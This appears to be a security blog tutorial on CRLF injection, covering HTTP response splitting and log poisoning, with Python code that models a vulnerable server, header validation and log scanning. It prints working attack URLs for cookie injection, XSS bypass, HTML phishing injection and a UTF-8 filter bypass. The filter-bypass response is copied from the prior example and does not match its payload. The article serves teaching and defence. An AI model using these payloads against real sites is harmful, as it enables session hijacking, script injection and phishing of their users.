NexaSec

Understanding CRLF Injection: Assessing Risks and Enhancing Web Security

What is CRLF injection?

CRLF injection is a vulnerability that lets a malicious hacker inject carriage return (CR) and line feed (LF) characters to change the way a web application works or to confuse its administrator. There are two main malicious uses for CRLF injection: log poisoning (also called log injection, log splitting, or log forging) and HTTP response splitting.

Carriage Return Line Feed

The term CRLF refers to Carriage Return (ASCII 13, \r) and Line Feed (ASCII 10, \n). Together they mark the end of a line, but today's popular operating systems treat them differently: Windows requires both a CR and an LF to end a line, whereas Linux/UNIX requires only an LF. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

How CRLF Injection Works

A CRLF Injection attack occurs when a malicious user successfully inserts CRLF sequences into an application, typically by modifying HTTP parameters or URLs. Once injected, these characters can lead to various exploitations, including log poisoning and HTTP response manipulation.

Exploitative Scenarios:

Log Poisoning: In a log poisoning attack, malicious actors inject CRLF characters into web server log files. This action aims to confuse both automated log analysis systems and manual log reviewers, potentially leading to further exploitation.

HTTP Response Splitting: HTTP response splitting occurs when attackers manipulate HTTP responses by injecting CRLF sequences. This manipulation can lead to a range of attacks, including XSS bypasses and content injection.

Examples of CRLF Injection Exploits:

CRLF – Add a Cookie

In this scenario, a malicious user injects a CRLF sequence to add a cookie to the HTTP response. By manipulating the URL parameters, the attacker forces the server to include a malicious cookie in the response headers.

Request:

http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue

Response:

Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block

CRLF – Add a cookie – XSS Bypass

Similar to the previous example, this exploit involves injecting a CRLF sequence to add a cookie. However, in this case, the attacker also bypasses XSS protection mechanisms by injecting a malicious script payload.

Request:

http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

Response:

HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0

CRLF – Write HTML

Here, the attacker injects a CRLF sequence to manipulate the HTTP response and inject custom HTML content. This can lead to various attacks, including phishing attempts and content spoofing.

Request:

http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E

Response:

Set-Cookie:en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34

<html>You have been Phished</html>

CRLF – Filter Bypass

Here the attacker evades a CRLF filter by sending multi-byte UTF-8 characters that the vulnerable server reduces to CR and LF after decoding (see the reminder below). This technique lets them inject content into the response headers even though a literal CRLF would have been blocked, potentially leading to further exploitation.

Request:

http://www.example.net/index.php?lang=%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE

Response:

Set-Cookie:en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34

<html>You have been Phished</html>

Reminder:

%E5%98%8A = %0A = \u560a
%E5%98%8D = %0D = \u560d
%E5%98%BE = %3E = \u563e (>)
%E5%98%BC = %3C = \u563c (<)
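The following is an added example, not code from the original article: it models a server that copies a query parameter into the Location header unchecked, shows that the "Write HTML" payload above yields two status lines in one response stream and that the UTF-8 payload still injects headers once the server truncates each code point to its low byte, and then shows a hardened header check. The server model (latin1_truncate) and the payload constants are constructed for this illustration.

```python
import re

# Constructed from the "Write HTML" and "Filter Bypass" requests above.
SPLIT_PAYLOAD = ("en\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\n"
                 "Content-Type: text/html\r\nContent-Length: 34\r\n\r\n"
                 "<html>You have been Phished</html>")
UTF8_PAYLOAD = ("\u560a\u560dcontent-type:text/html\u560a\u560dlocation:"
                "\u560a\u560d\u560a\u560d\u563csvg/onload=alert(innerHTML()\u563e")

def latin1_truncate(text: str) -> str:
    """Assumed server bug: keep only the low byte of each code point, so
    U+560A / U+560D (%E5%98%8A / %E5%98%8D) become LF / CR."""
    return "".join(chr(ord(c) & 0xFF) for c in text)

def naive_redirect(lang: str) -> bytes:
    """Vulnerable: copies the query parameter into a header unchecked."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: https://www.example.net/?lang={latin1_truncate(lang)}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")

def count_status_lines(raw: bytes) -> int:
    """More than one status line in a single response means it was split."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3}", raw))

def header_names(raw: bytes) -> list:
    """Header names a lenient parser (accepting LF or CR LF) would see."""
    names = []
    for line in re.split(rb"\r?\n\r?", raw)[1:]:
        if line == b"":
            break  # blank line ends the header block
        if b":" in line:
            names.append(line.split(b":", 1)[0].strip().lower().decode())
    return names

def safe_header_value(value: str) -> str:
    """Hardened: refuse CR/LF, including code points that collapse to them."""
    if re.search(r"[\r\n]", value) or re.search(r"[\r\n]", latin1_truncate(value)):
        raise ValueError("CR/LF not allowed in header value")
    return value
```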

What is log poisoning?

Log poisoning, a subset of CRLF injection attacks, involves injecting CRLF characters into web server log files. By doing so, attackers aim to confuse log analysis systems and system administrators browsing the logs manually. This confusion can lead to overlooking malicious activities or misinterpreting log data.

Example of Log Poisoning Exploit:

In this example, a malicious user injects CRLF characters into a web server log file, causing confusion in the log analysis process. By injecting fake HTTP response headers and altering response data, the attacker can manipulate log entries and potentially evade detection.

http://www.example.com/example.php?id= – starting a valid request to a page with a CRLF injection vulnerability.

%0d%0aContent-Length:%200 – a fake HTTP response header of Content-Length: 0. This causes the web browser to treat this response as terminated and start parsing the next response.

%0d%0a%0d%0aHTTP/1.1%20200%20OK – the injected new response begins here with a double CRLF sequence followed by HTTP/1.1 200 OK.

%0d%0aContent-Type:%20text/html – another fake HTTP response header: Content-Type: text/html. This is required for the browser to treat this data as HTML content.

%0d%0aContent-Length:%2025 – yet another fake HTTP response header: Content-Length: 25. This instructs the browser to parse only the next 25 bytes and discard any remaining data as junk, causing it to ignore the legitimate HTTP content sent by the web server.

%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E – a double CRLF sequence signals that the headers are over and the response body starts. The injected page content is <script>alert(1)</script>, which causes the user’s browser to display an alert instead of the actual example.php page.
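As an added example (not from the original article), the code below shows the two defensive halves of the log poisoning problem: escaping attacker-controlled fields so a CRLF can never start a forged log entry, and scanning an existing combined-format access log for entries that carry encoded CR/LF or that do not parse as a real entry. The log format regex and the sample log lines are constructed for this illustration.

```python
import re

CONTROL = re.compile(r"[\x00-\x1f\x7f]")
ENCODED_CRLF = re.compile(r"%0[dD]|%0[aA]")
# Apache "combined" format, assumed here as the log layout being defended.
COMBINED = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ "[^"]*" "[^"]*"$'
)

# Constructed sample: a clean request, a request with an encoded CRLF in the
# URL, and a fragment of a forged entry that reached the log via raw CRLF.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [09/May/2016:14:47:29 +0000] "GET /index.php?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/May/2016:14:47:31 +0000] "GET /index.php?lang=en%0d%0aContent-Length:%200 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'HTTP/1.1 200 OK',
])

def escape_for_log(value: str) -> str:
    """Escape CR, LF and other control bytes so an attacker-supplied value
    can never terminate the current line and start a new log entry."""
    return CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)

def log_entry(ip, when, request, status, size, referer, agent) -> str:
    """Build one combined-format line from escaped user-controlled fields."""
    req, ref, ua = (escape_for_log(str(f)) for f in (request, referer, agent))
    return f'{ip} - - [{when}] "{req}" {status} {size} "{ref}" "{ua}"'

def suspicious_lines(log_text: str) -> list:
    """1-based line numbers whose request carries encoded CR/LF, or which do
    not parse as a combined-format entry (a tell-tale of a forged line)."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED.match(line)
        if m is None or ENCODED_CRLF.search(m.group("req")):
            hits.append(n)
    return hits
```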

Further Resources

To learn more about CRLF injection and related web security vulnerabilities, refer to the following resources:

Practical Labs

For hands-on experience and advanced learning, you can explore labs provided by platforms like PortSwigger, which offer scenarios to practice and understand CRLF injection and related techniques.

